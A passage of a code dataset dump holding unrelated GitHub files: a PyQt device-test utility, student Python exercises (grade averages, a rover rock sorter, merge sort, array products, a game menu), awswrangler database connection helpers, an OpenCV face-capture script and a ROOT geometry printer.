'data': ['A'], 'delay': 0, 'msg': 'set sync sourse to ch A...'},\n {'cmd': self.ns3.sync_type, 'data': ['rise'], 'delay': 0, 'msg': 'set sync type \\'rise\\'...'},\n {'cmd': self.ns3.sweep_div, 'data': ['1uS'], 'delay': 0, 'msg': 'set sweep 1uS/div...'},\n {'cmd': self.ns3.sweep_mode, 'data': ['standart'], 'delay': 0, 'msg': 'set swep mode \\'standart\\'...'},\n {'cmd': self.ns3.get_data, 'data': ['A', 100, []], 'delay': 0, 'msg': 'get ch A 100 bytes data...'},\n {'cmd': self.ns3.get_data, 'data': ['B', 100, []], 'delay': 0, 'msg': 'get ch B 100 bytes data...'},\n ]\n\n progr_one_step = 100 / len(ns_test_sequence)\n progr = 0\n\n self.log('start test sequence')\n for cn in ns_test_sequence:\n self.log(cn['msg'])\n # send sequense command\n cmd_result = cn['cmd']( cn['data'] )\n # result\n if not cmd_result:\n self.log('SUCCESS\\r\\n')\n sleep(cn['delay'])\n progr = progr + progr_one_step\n self.test_progress_signal.emit(progr) # emit progress signal\n else:\n self.log('FAILED\\r\\n', 'err')\n return False\n return True\n\n # device main test\n def ns_test_main(self):\n lg = self.log\n test_seq_flag = True\n self.test_progress_signal.emit(0) # complite progress = 0%\n\n # set interface\n index = self.combobox_Interface.currentIndex()\n\n if self.chckbx_interface.checkState():\n interface_log = self.log_signal.emit\n else:\n interface_log = None\n\n if index == 0:\n self.log(str(self.chckbx_interface.checkState()))\n self.ns3.set_interface( interface = 'usbxpress', log = interface_log )\n\n elif index == 1:\n ip, port = self.lineEdit_IP_Port.text().split(':')\n self.ns3.set_interface( interface = 'telnet', ip = ip, port = int(port), log = interface_log )\n\n if self.nslog_chckbx.checkState():\n self.ns3.set_log(self.log_signal.emit)\n else:\n self.ns3.set_log(None)\n\n lg('connect to device...')\n if not self.ns3.connect():\n lg('successful connected to device, fw ver: %3.1F' %\n self.ns3.mcu_firm_ver)\n\n lg('get batt charge...')\n battv = [int(0)]\n if self.ns3.get_batt(battv):\n return False\n lg('batt charge: %d%s' % (battv[0], '%'))\n\n # start test sequence\n test_seq_flag = self.ns_test_seq()\n\n lg('disconnect from device...')\n if not self.ns3.disconnect():\n lg('disconnect success')\n else:\n test_seq_flag = False\n lg('FAILED', 'err')\n else:\n test_seq_flag = False\n lg('FAILED', 'err')\n\n # complite progress = 100%\n self.test_progress_signal.emit(100)\n\n lg('\\r\\n///{0}///{0}///'.format('-' * 20), 'end')\n if test_seq_flag:\n lg('TEST SUCCESSFUL DONE', 'end')\n else:\n lg('TEST FAILED', 'err')\n\n # The worker thread pulls an item from the queue and processes it\n def ns_test_worker(self):\n while True:\n item = self.nqueue.get()\n with threading.Lock():\n if item == 'start':\n import random\n for m in self.start_msg:\n self.log_signal.emit(m, '')\n sleep(random.uniform(0.15, 0.3))\n if item == 'test':\n self.ns_test_main()\n sleep(0.5)\n self.device_ready_signal.emit(True)\n self.startButton.setEnabled(True)\n\n self.nqueue.task_done()\n\n # START button click slot\n @pyqtSlot()\n def StartButtonClicked(self):\n if not self.startButton.isEnabled():\n return\n self.device_ready_signal.emit(False)\n self.startButton.setEnabled(False)\n\n self.nqueue.join() # block until all tasks are done\n\n self.textBrowser.clear()\n self.chckbx_interface.toggled.emit(self.chckbx_interface.isChecked())\n self.nslog_chckbx.toggled.emit(self.nslog_chckbx.isChecked())\n\n self.nqueue.put('test') # start ns test thread\n\n # device test sequence progress signal/slot\n old_progr = 0\n\n def test_progress_slot(self, progress):\n if (progress - self.old_progr) > 20:\n self.anim.timer.setInterval(600 - (progress * 5))\n self.old_progr = progress\n elif not progress:\n self.old_progr = progress\n\n # device test sequence successfull complite signal/slot\n @pyqtSlot(bool)\n def device_ready_slot(self, dev_rdy):\n self.anim.timer.setInterval(1000)\n # save log to file\n f = open('logg.txt', 'wt')\n f.write(self.textBrowser.toPlainText())\n f.close()\n\n # QtSlot for log masagges\n @pyqtSlot(str, str)\n def qlog_message(self, msg, lvl=''):\n txbr = self.textBrowser\n qqolor = QtGui.QColor.fromRgb\n\n if lvl == 'err':\n txbr.setTextColor(qqolor(255, 64, 64))\n elif lvl == 'warn':\n txbr.setTextColor(qqolor(220, 220, 140))\n elif lvl == 'ginf':\n txbr.setTextColor(qqolor(255, 255, 255))\n elif lvl == 'end':\n txbr.setTextColor(qqolor(170, 255, 0))\n elif lvl == 'inf':\n txbr.setTextColor(qqolor(119, 255, 176))\n else:\n txbr.setTextColor(qqolor(212, 224, 212))\n\n txbr.insertPlainText(\n '%s: %s \\r\\n' % (str(datetime.utcnow()).split()[1], msg))\n sb = txbr.verticalScrollBar()\n sb.setValue(sb.maximum())\n txbr.repaint()\n\n # EXIT button click\n @pyqtSlot()\n def CloseButtonClicked(self):\n self.close()\n\n\n# program start here\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n QApplication.setStyle(QStyleFactory.create('Fusion'))\n ex = ns_utility()\n sys.exit(app.exec_())\n","repo_name":"LeftRadio/ns_test_util","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33978501566","text":"print(\"Sistema para calcular el promedio de un alumno.\")\n\nnombre = input(\"Para comensar, cúal es tu nombre: \")\n\nmatematicas = float(input(nombre + \" ¿Cuál es tu calificación en matematicas: \"))\nquímica = float(input(nombre + \" ¿Cuál es tu calificación en química: \"))\nbíologia = float(input(nombre + \" ¿Cuál es tu calificación en bíologia: \"))\n\npromedio = (matematicas + química + bíologia) / 3\n\nif promedio >=6:\n print(' Felicidades ' + nombre + ' \"Aprobaste\" con un promedio de: ', round(promedio,2))\n\nelse:\n print('Lo sientimos ' + nombre + ' \"Reprobaste\" el año con un promedio: ', round(promedio,2))\n\nprint(\"Fin\")\n","repo_name":"arteduro/Python_Ejercicios","sub_path":"Condicionales_Compuestas.py","file_name":"Condicionales_Compuestas.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74555621210","text":"#Nome da Disciplina: Estrutura de Dados.\n#Turma: 3° BD\n#Número da pergunta: 2\n#Titúlo da pergunta: Rover Curiosity\n#Integrante 1: Ivan Szoboszlay Junior\n#Integrante 2: Leonardo Silva de Oliveira\n#Data: 31/03/2020\n#Professor: Jorge Carlos Valverde Rebaza\nimport random\nfrom random import randrange, uniform\n\nclass Rocha:\n def __init__(self):\n listarocha = []\n\n def PuchPostRocha(self):\n tamanho = random.randint(30, 120)\n listarochapeso = []\n listadiamentro = []\n for rocha in range(100):\n listarochapeso.append(uniform(0.5, 2.5))\n listadiamentro.append(uniform(0, 0.74))\n return listarochapeso, listadiamentro\n\n'''\nclass LixoEspacial:\n def __init__(self, pinha = None):\n lista = []\n\n def PushPost(self):\n tamanho = random.randint(30,120)\n\n for peso in range(tamanho):\n lista.append(uniform(1.2,8.55))#peso do lixo espacial\n'''\n\nclass Curiosity:\n\n def __init__(self, lista=None, tipo1=None, tipo2=None, tipo3=None):\n self.lista = []\n self.lixo = []\n self.tipo1 = []\n self.tipo2 = []\n self.tipo3 = []\n self.teste = 0\n\n #Metodo de criação de post\n def PushPost(self,tipo, peso, diamentro):\n \n if tipo == 1: #Validar se o tipo é rocha\n\n if (peso>= 0.0 and peso<= 2.5) and (diamentro>=0.0 and diamentro<=0.74):#Condicao de peso ser menor de 2,5Kg e diamentro for menor de 0,74m\n classpropria = Curiosity()\n #classpropria.equilibrar()\n \n if peso <=0.83 and diamentro<=0.24:#Tipo 1\n self.tipo1.append(peso)\n \n elif peso > 0.83 and peso <= 1.25 and diamentro >0.24 and diamentro<=0.50:#Tipo 2\n self.tipo2.append(peso)\n else:\n self.tipo3.append(peso)\n\n else: \n self.teste += 1\n print(\"Rocha Descartado\") \n\n else:\n if tipo == \"metalico\":\n\n return 1 \n else:# Lixo nao metalico\n return 1 \n #Função para equilibrar as rocha \n\n #o robô avalia a\n #quantidade de rochas em função do seu tipo e, rejeita (elimina) as rochas necessárias até\n #ter uma quantidade mais ou menos equilibrada de tipos de rochas.\n\n def equilibrar(self):\n print(self.tipo1)\n Peso_Total = 0\n comparacao = []\n Peso_Total += sum(self.tipo1)\n Peso_Total += sum(self.tipo2)\n Peso_Total += sum(self.tipo3)\n print(Peso_Total,\"Teste\")\n if Peso_Total <= 70:#Verificar o peso do armazenamento\n return True\n else:\n print(\"Acionou a funcao de equilibrar\") \n comparacao.append(len(self.tipo1))\n comparacao.append(len(self.tipo2))\n comparacao.append(len(self.tipo3))\n comparacaomenor = 3\n vazio = 0\n for i in range(3):\n if comparacao[i] == 0:\n vazio += 1\n \n #Caso apenas uma das lista tenha valor\n if vazio == 2:\n if len(self.tipo1) > 0:\n acima = self.tipo1\n\n elif len(self.tipo2) > 0:\n acima = self.tipo2\n\n else:\n acima = self.tipo3\n \n unico = max(comparacao) // 2\n for i in range(unico):\n del(acima[i]) \n return True \n else:\n\n #Para verificar se alguma dos(tipo1,tipo2 e tipo3) for vazia \n if len(self.tipo1) == 0:\n comparacaomenor=0\n elif len(self.tipo2) == 0:\n comparacaomenor = 1\n else:\n comparacaomenor = 2\n\n maior=max(comparacao)\n #Verificar se as 3 lista(tipo1,tipo2 e tipo3) tem valor acima de 0.\n if comparacaomenor != 3:\n posicaomaior = comparacao.index(maior)\n #Sa tipo1 for vazia \n if comparacaomenor == 0:\n #verificar se a posicao é igual a 1 e adicioar o valor da posicao 2 na 0.\n if posicaomaior == 1:\n comparacao[0] = comparacao[2]\n #falso adicioar o valor da posicao 1 na 0.\n else:\n comparacao[0] = comparacao[1]\n #Se a tipo2 for vazio\n elif comparacaomenor == 1:\n #verificar se a posicao do maior é 0 se for adicionar o valor da posição 2 na posicao 1 da lista comparacao\n if posicaomaior == 0:\n comparacao[1] = comparacao[2]\n print(comparacao,\"1\")\n #Falso a posicao 1 o valor da posicao 0\n else:\n comparacao[1] = comparacao[0]\n print(comparacao, \"2\")\n #Se a tipo3 for vazia \n else:\n #verificar se a posicao do maior é 0 se for adicionar o valor da posição 1 na posicao 2 da lista comparacao\n if posicaomaior == 0:\n comparacao[2] = comparacao[1]\n \n #Falso substituir o valor da posicao 2 com o da posicao 0\n else:\n comparacao[2] = comparacao[0]\n \n \n menor = min(comparacao)\n tirar = maior-menor\n controle = 0\n #Loop para apagar valor das tipo1, tipo2 e tipo3 e deixa equilibrado \n while controle != 2:\n #Verificar se as tipo1,tipo2 e tipo3 esta equilibrada \n if len(self.tipo2) == len(self.tipo1) == len(self.tipo3) or len(self.tipo1) == len(self.tipo2) or len(self.tipo2) == len(self.tipo3) or len(self.tipo3) == len(self.tipo1) :\n controle = 2\n else:\n x = comparacao.index(maior)#Pegar o indece do maior valor da comparacao\n if x == 0:\n for i in range(tirar):\n del(self.tipo1[i])#Apagar valor dentro da lista\n comparacao[0] = menor\n elif x == 1:\n for i in range(tirar):\n del(self.tipo2[i])#Apagar valor dentro da lista\n else:\n for i in range(tirar):\n del(self.tipo3[i])#Apagar valor dentro da lista\n maior = max(comparacao)\n maior = max(comparacao)\n menor = min(comparacao)\n tira = maior-menor\n return True \n \n'''\n\n def rejeita(self):\n pinha=[]\n lista=[]\n #instancia a class \n armazenamento=Rocha()\n for x in range(30):\n \n tamanho=random.randint(30,120)\n pinha.append(uniform(0.5,14.2))#Peso das rocha\n\n'''\nrobo = Curiosity()\nrocha = Rocha()\npeso, diamentro = rocha.PuchPostRocha()\nprint(f\"Peso das rochas coletadas: {peso}.\")\nprint(f\"Diamentro das rochas coletadas: {diamentro} .\")\n\nfor x in range(len(peso)):\n robo.PushPost(1, peso[x], diamentro[x])\nprint(\"Teste \", robo.teste)\nprint(\"Tipo1: \", robo.tipo1)\nprint(\"Tipo2: \", robo.tipo2)\nprint(\"Tipo3: \", robo.tipo3)\n\n\n","repo_name":"Leonardoliveira/Formacao-Python","sub_path":"AC02-EstruturaDeDados/ac2final_Parte2.py","file_name":"ac2final_Parte2.py","file_ext":"py","file_size_in_byte":7718,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28877451969","text":"'''\r\nThis program implements merge sort to sort an array of length n\r\nAuthor: Juan Ríos\r\n'''\r\n\r\ndef read_file(path):\r\n File = open(path,'r')\r\n content = File.read()\r\n array = content.split('\\n')\r\n tmp = []\r\n for i in array:\r\n tmp.append(int(i))\r\n return tmp\r\n\r\n\r\ndef merge(b_array, c_array):\r\n n = len(b_array)+len(c_array)\r\n d_array = []\r\n i = 0\r\n j = 0\r\n inv = 0\r\n for k in range(n):\r\n if b_array[i] List[int]:\n N = len(nums)\n res, curr = [0] * N, 1\n res[0] = nums[0] # make it a cummulative product array\n for i in range(1, N):\n res[i] = nums[i] * res[i-1]\n \n for i in range(N-1, 0, -1): # go backwards\n res[i] = res[i-1] * curr # curr = everything to the right of i, res[i-1] = everything to the left of i\n curr *= nums[i] # update curr\n res[0] = curr # bounds issues\n return res\n \n","repo_name":"apluscs/Leetcode","sub_path":"0238. Product of Array Except Self.py","file_name":"0238. Product of Array Except Self.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10823498223","text":"import forca\nimport adivinhação\n\ndef escolhe_game():\n #Header\n print(\"-=-\"*13)\n print(\"Escolha seu jogo:\")\n print(\"-=-\"*13)\n\n while True:\n option = int(input(\"(1) Adivinhação (2) Forca (3) Sair\\n\"))\n if(option == 1):\n adivinhação.advinhação()\n elif(option == 2):\n forca.forca()\n else:\n break\n\n #Footer\n print(\"Fim do jogo, obrigado por jogar!!\")\n print(\"-=-\"*13)\n\n#main\nif __name__ == '__main__':\n escolhe_game()","repo_name":"Felipe-Baz-XDS/Jogos-Curso-python","sub_path":"jogos.py","file_name":"jogos.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35801463555","text":"\"\"\"Databases Utilities.\"\"\"\n\nimport importlib.util\nimport logging\nimport ssl\nfrom typing import Any, Dict, Generator, Iterator, List, NamedTuple, Optional, Tuple, Union, cast, overload\n\nimport boto3\nimport pyarrow as pa\nfrom typing_extensions import Literal\n\nimport awswrangler.pandas as pd\nfrom awswrangler import _data_types, _utils, exceptions, oracle, secretsmanager\nfrom awswrangler.catalog import get_connection\n\n_oracledb_found = importlib.util.find_spec(\"oracledb\")\n\n_logger: logging.Logger = logging.getLogger(__name__)\n\n\nclass ConnectionAttributes(NamedTuple):\n \"\"\"Connection Attributes.\"\"\"\n\n kind: str\n user: str\n password: str\n host: str\n port: int\n database: str\n ssl_context: Optional[ssl.SSLContext]\n\n\ndef _get_dbname(cluster_id: str, boto3_session: Optional[boto3.Session] = None) -> str:\n client_redshift = _utils.client(service_name=\"redshift\", session=boto3_session)\n res = client_redshift.describe_clusters(ClusterIdentifier=cluster_id)[\"Clusters\"][0]\n return res[\"DBName\"]\n\n\ndef _get_connection_attributes_from_catalog(\n connection: str, catalog_id: Optional[str], dbname: Optional[str], boto3_session: Optional[boto3.Session]\n) -> ConnectionAttributes:\n details: Dict[str, Any] = get_connection(name=connection, catalog_id=catalog_id, boto3_session=boto3_session)[\n \"ConnectionProperties\"\n ]\n if \";databaseName=\" in details[\"JDBC_CONNECTION_URL\"]:\n database_sep = \";databaseName=\"\n else:\n database_sep = \"/\"\n port, database = details[\"JDBC_CONNECTION_URL\"].split(\":\")[-1].split(database_sep)\n ssl_context: Optional[ssl.SSLContext] = None\n if details.get(\"JDBC_ENFORCE_SSL\") == \"true\":\n ssl_cert_path: Optional[str] = details.get(\"CUSTOM_JDBC_CERT\")\n ssl_cadata: Optional[str] = None\n if ssl_cert_path:\n bucket_name, key_path = _utils.parse_path(ssl_cert_path)\n client_s3 = _utils.client(service_name=\"s3\", session=boto3_session)\n try:\n ssl_cadata = client_s3.get_object(Bucket=bucket_name, Key=key_path)[\"Body\"].read().decode(\"utf-8\")\n except client_s3.exceptions.NoSuchKey:\n raise exceptions.NoFilesFound( # pylint: disable=raise-missing-from\n f\"No CA certificate found at {ssl_cert_path}.\"\n )\n ssl_context = ssl.create_default_context(cadata=ssl_cadata)\n\n if \"SECRET_ID\" in details:\n secret_value: Dict[str, Any] = secretsmanager.get_secret_json(\n name=details[\"SECRET_ID\"], boto3_session=boto3_session\n )\n username = secret_value[\"username\"]\n password = secret_value[\"password\"]\n else:\n username = details[\"USERNAME\"]\n password = details[\"PASSWORD\"]\n\n return ConnectionAttributes(\n kind=details[\"JDBC_CONNECTION_URL\"].split(\":\")[1].lower(),\n user=username,\n password=password,\n host=details[\"JDBC_CONNECTION_URL\"].split(\":\")[-2].replace(\"/\", \"\").replace(\"@\", \"\"),\n port=int(port),\n database=dbname if dbname is not None else database,\n ssl_context=ssl_context,\n )\n\n\ndef _get_connection_attributes_from_secrets_manager(\n secret_id: str, dbname: Optional[str], boto3_session: Optional[boto3.Session]\n) -> ConnectionAttributes:\n secret_value: Dict[str, Any] = secretsmanager.get_secret_json(name=secret_id, boto3_session=boto3_session)\n kind: str = secret_value[\"engine\"]\n if dbname is not None:\n _dbname: str = dbname\n elif \"dbname\" in secret_value:\n _dbname = secret_value[\"dbname\"]\n else:\n if kind != \"redshift\":\n raise exceptions.InvalidConnection(f\"The secret {secret_id} MUST have a dbname property.\")\n _dbname = _get_dbname(cluster_id=secret_value[\"dbClusterIdentifier\"], boto3_session=boto3_session)\n return ConnectionAttributes(\n kind=kind,\n user=secret_value[\"username\"],\n password=secret_value[\"password\"],\n host=secret_value[\"host\"],\n port=int(secret_value[\"port\"]),\n database=_dbname,\n ssl_context=None,\n )\n\n\ndef get_connection_attributes(\n connection: Optional[str] = None,\n secret_id: Optional[str] = None,\n catalog_id: Optional[str] = None,\n dbname: Optional[str] = None,\n boto3_session: Optional[boto3.Session] = None,\n) -> ConnectionAttributes:\n \"\"\"Get Connection Attributes.\"\"\"\n if connection is None and secret_id is None:\n raise exceptions.InvalidArgumentCombination(\n \"Failed attempt to connect. You MUST pass a connection name (Glue Catalog) OR a secret_id as argument.\"\n )\n if connection is not None:\n return _get_connection_attributes_from_catalog(\n connection=connection, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session\n )\n return _get_connection_attributes_from_secrets_manager(\n secret_id=cast(str, secret_id), dbname=dbname, boto3_session=boto3_session\n )\n\n\ndef _convert_params(sql: str, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]]) -> List[Any]:\n args: List[Any] = [sql]\n if params is not None:\n if hasattr(params, \"keys\"):\n return args + [params]\n return args + [list(params)]\n return args\n\n\ndef _should_handle_oracle_objects(dtype: pa.DataType) -> bool:\n return (\n dtype == pa.string()\n or dtype == pa.large_string()\n or isinstance(dtype, pa.Decimal128Type)\n or dtype == pa.binary()\n or dtype == pa.large_binary()\n )\n\n\ndef _records2df(\n records: List[Tuple[Any]],\n cols_names: List[str],\n index: Optional[Union[str, List[str]]],\n safe: bool,\n dtype: Optional[Dict[str, pa.DataType]],\n timestamp_as_object: bool,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"],\n) -> pd.DataFrame:\n arrays: List[pa.Array] = []\n for col_values, col_name in zip(tuple(zip(*records)), cols_names): # Transposing\n if (dtype is None) or (col_name not in dtype):\n if _oracledb_found:\n col_values = oracle.handle_oracle_objects(col_values, col_name) # ruff: noqa: PLW2901\n try:\n array: pa.Array = pa.array(obj=col_values, safe=safe) # Creating Arrow array\n except pa.ArrowInvalid as ex:\n array = _data_types.process_not_inferred_array(ex, values=col_values) # Creating Arrow array\n else:\n try:\n if _oracledb_found:\n if _should_handle_oracle_objects(dtype[col_name]):\n col_values = oracle.handle_oracle_objects(col_values, col_name, dtype)\n array = pa.array(obj=col_values, type=dtype[col_name], safe=safe) # Creating Arrow array with dtype\n except (pa.ArrowInvalid, pa.ArrowTypeError):\n array = pa.array(obj=col_values, safe=safe) # Creating Arrow array\n array = array.cast(target_type=dtype[col_name], safe=safe) # Casting\n arrays.append(array)\n if not arrays:\n df = pd.DataFrame(columns=cols_names)\n else:\n table = pa.Table.from_arrays(arrays=arrays, names=cols_names) # Creating arrow Table\n df = table.to_pandas( # Creating Pandas DataFrame\n use_threads=True,\n split_blocks=True,\n self_destruct=True,\n integer_object_nulls=False,\n date_as_object=True,\n types_mapper=_data_types.get_pyarrow2pandas_type_mapper(dtype_backend=dtype_backend),\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n )\n if index is not None:\n df.set_index(index, inplace=True)\n return df\n\n\ndef _get_cols_names(cursor_description: Any) -> List[str]:\n cols_names = [col[0].decode(\"utf-8\") if isinstance(col[0], bytes) else col[0] for col in cursor_description]\n _logger.debug(\"cols_names: %s\", cols_names)\n\n return cols_names\n\n\ndef _iterate_results(\n con: Any,\n cursor_args: List[Any],\n chunksize: int,\n index_col: Optional[Union[str, List[str]]],\n safe: bool,\n dtype: Optional[Dict[str, pa.DataType]],\n timestamp_as_object: bool,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"],\n) -> Iterator[pd.DataFrame]:\n with con.cursor() as cursor:\n cursor.execute(*cursor_args)\n if _oracledb_found:\n decimal_dtypes = oracle.detect_oracle_decimal_datatype(cursor)\n _logger.debug(\"steporig: %s\", dtype)\n if decimal_dtypes and dtype is not None:\n dtype = dict(list(decimal_dtypes.items()) + list(dtype.items()))\n elif decimal_dtypes:\n dtype = decimal_dtypes\n\n cols_names = _get_cols_names(cursor.description)\n while True:\n records = cursor.fetchmany(chunksize)\n if not records:\n break\n yield _records2df(\n records=records,\n cols_names=cols_names,\n index=index_col,\n safe=safe,\n dtype=dtype,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n\ndef _fetch_all_results(\n con: Any,\n cursor_args: List[Any],\n index_col: Optional[Union[str, List[str]]] = None,\n dtype: Optional[Dict[str, pa.DataType]] = None,\n safe: bool = True,\n timestamp_as_object: bool = False,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = \"pyarrow\",\n) -> pd.DataFrame:\n with con.cursor() as cursor:\n cursor.execute(*cursor_args)\n cols_names = _get_cols_names(cursor.description)\n if _oracledb_found:\n decimal_dtypes = oracle.detect_oracle_decimal_datatype(cursor)\n _logger.debug(\"steporig: %s\", dtype)\n if decimal_dtypes and dtype is not None:\n dtype = dict(list(decimal_dtypes.items()) + list(dtype.items()))\n elif decimal_dtypes:\n dtype = decimal_dtypes\n\n return _records2df(\n records=cast(List[Tuple[Any]], cursor.fetchall()),\n cols_names=cols_names,\n index=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: None = ...,\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> pd.DataFrame:\n ...\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n *,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: int,\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> Iterator[pd.DataFrame]:\n ...\n\n\n@overload\ndef read_sql_query(\n sql: str,\n con: Any,\n *,\n index_col: Optional[Union[str, List[str]]] = ...,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = ...,\n chunksize: Optional[int],\n dtype: Optional[Dict[str, pa.DataType]] = ...,\n safe: bool = ...,\n timestamp_as_object: bool = ...,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = ...,\n) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:\n ...\n\n\ndef read_sql_query(\n sql: str,\n con: Any,\n index_col: Optional[Union[str, List[str]]] = None,\n params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None,\n chunksize: Optional[int] = None,\n dtype: Optional[Dict[str, pa.DataType]] = None,\n safe: bool = True,\n timestamp_as_object: bool = False,\n dtype_backend: Literal[\"numpy_nullable\", \"pyarrow\"] = \"numpy_nullable\",\n) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:\n \"\"\"Read SQL Query (generic).\"\"\"\n args = _convert_params(sql, params)\n try:\n if chunksize is None:\n return _fetch_all_results(\n con=con,\n cursor_args=args,\n index_col=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n\n return _iterate_results(\n con=con,\n cursor_args=args,\n chunksize=chunksize,\n index_col=index_col,\n dtype=dtype,\n safe=safe,\n timestamp_as_object=timestamp_as_object,\n dtype_backend=dtype_backend,\n )\n except Exception as ex:\n con.rollback()\n _logger.error(ex)\n raise\n\n\ndef generate_placeholder_parameter_pairs(\n df: pd.DataFrame, column_placeholders: str, chunksize: int\n) -> Generator[Tuple[str, List[Any]], None, None]:\n \"\"\"Extract Placeholder and Parameter pairs.\"\"\"\n\n def convert_value_to_native_python_type(value: Any) -> Any:\n if pd.isna(value):\n return None\n if hasattr(value, \"to_pydatetime\"):\n return value.to_pydatetime()\n\n return value\n\n parameters = df.values.tolist()\n for i in range(0, len(df.index), chunksize):\n parameters_chunk = parameters[i : i + chunksize]\n chunk_placeholders = \", \".join([f\"({column_placeholders})\" for _ in range(len(parameters_chunk))])\n flattened_chunk = [convert_value_to_native_python_type(value) for row in parameters_chunk for value in row]\n yield chunk_placeholders, flattened_chunk\n\n\ndef validate_mode(mode: str, allowed_modes: List[str]) -> None:\n \"\"\"Check if mode is included in allowed_modes.\"\"\"\n if mode not in allowed_modes:\n raise exceptions.InvalidArgumentValue(f\"mode must be one of {', '.join(allowed_modes)}\")\n","repo_name":"aws/aws-sdk-pandas","sub_path":"awswrangler/_databases.py","file_name":"_databases.py","file_ext":"py","file_size_in_byte":13918,"program_lang":"python","lang":"en","doc_type":"code","stars":3653,"dataset":"github-code","pt":"32"} +{"seq_id":"33929479101","text":"class Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n # Would be really easy if you could use the division operator\n # Use a prefix postfix approach\n res = [1] * len(nums)\n product = 1\n # Getting prefix array using nums\n for i in range(len(nums)):\n res[i] *= product\n product *= nums[i]\n product = 1\n # Second pass applying postfix\n for i in range(len(nums)-1, -1, -1):\n res[i] *= product\n product *= nums[i]\n return res\n \n \n \n ","repo_name":"Danryanh7/Leetcode","sub_path":"0238-product-of-array-except-self/0238-product-of-array-except-self.py","file_name":"0238-product-of-array-except-self.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38897761152","text":"# This file captures faces of user\n\nimport cv2 as cv\n\n\ndef detectAndDisplay(img):\n # img = cv.equalizeHist(img)\n faces = face_cascade.detectMultiScale(img)\n for (x, y, w, h) in faces:\n # center = (x + w // 2, y + h // 2)\n # img = cv.ellipse(img, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)\n img = cv.rectangle(img, (x, y), (x + w, y + h), 255, 4)\n cv.imshow('Face detection', img)\n return faces\n\n\ndef crop(img, p1, p2):\n return img[p1[1]:p2[1], p1[0]:p2[0]]\n\n\nface_cascade = cv.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nif __name__ == \"__main__\":\n cap = cv.VideoCapture(0)\n if not cap.isOpened():\n print(\"Unable to open camera.\")\n exit()\n print(\"Successfully open camera!\")\n\n count = 0\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"Cannot receive frame. Exiting...\")\n\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = detectAndDisplay(gray)\n\n key = cv.waitKey(1)\n if key == ord('q'):\n print('Quit')\n break\n if key == ord('s'):\n print('Save')\n x, y, w, h = faces[0]\n p1 = (x, y)\n p2 = (x + w, y + h)\n img = crop(gray, p1, p2)\n cv.imwrite(\"img%d.png\" % count, img)\n count += 1\n cap.release()\n cv.destroyAllWindows()\n","repo_name":"Bugart-Lan/Face_Recognition","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17264856381","text":"from ROOT import TChain\nimport sys\nch=TChain(\"geotree\")\nch.AddFile(sys.argv[1])\nch.GetEntry(0)\n\npmtX,pmtY,pmtZ = ch.pmtX, ch.pmtY, ch.pmtZ\nminX,minY,minZ = ch.minX, ch.minY, ch.minZ\nmaxX,maxY,maxZ = ch.maxX, ch.maxY, ch.maxZ\n\ntpcid=0\n\nprint('DetectorSpecs: {')\nprint(' MaxPosition: [%f,%f,%f]' % (maxX[tpcid],maxY[tpcid],maxZ[tpcid]))\nprint(' MinPosition: [%f,%f,%f]' % (minX[tpcid],minY[tpcid],minZ[tpcid]))\nfor pmt in range(pmtX.size()):\n print(' PMT%d: [%f,%f,%f]' % (pmt, pmtX[pmt], pmtY[pmt], 